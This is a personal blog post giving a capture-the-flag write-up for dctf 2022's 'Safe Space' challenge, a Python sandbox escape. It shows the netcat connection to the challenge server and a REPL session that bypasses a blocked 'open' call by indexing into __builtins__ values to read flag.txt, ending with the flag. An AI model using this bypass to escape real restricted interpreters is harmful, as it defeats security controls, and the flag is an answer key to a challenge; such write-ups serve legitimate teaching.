Jett's blog

dctf 2022 Safe Space writeup

Posted on Apr 18, 2022

The problem

link to the problem(requires login)

Solution

First, connect to the remote server:

nc 51.124.222.205 13379

After interacting with the server, you’ll find that the server is a python REPL with a lot of charcters and functions such as " unavaliable. This type of problem is called python sandbox escape, or python jail.

After trying all the commands from the internet, you’ll find that the command __builtins__ is not banned for this problem. Inside the __builtins__ dict, we have FILE set to flag.txt, and the open function, which is also unavaliable if entered directly.

Therefore, to read the contents of flag.txt, we can use the list of vlaues in builtins dict, and access it by index. Here’s the entire process:

>>>__builtins__
{'open': <built-in function open>, 'print': <built-in function print>, 'list': <class 'list'>, 'FILE': 'flag.txt'}
>>>FILE
flag.txt
>>>open(FILE).read()
Yeah no.
>>>list(__builtins__.values())[0](FILE).read()
dctf{bur5t_y0ur_bubbl3}

Thus, the flag is dctf{bur5t_y0ur_bubbl3}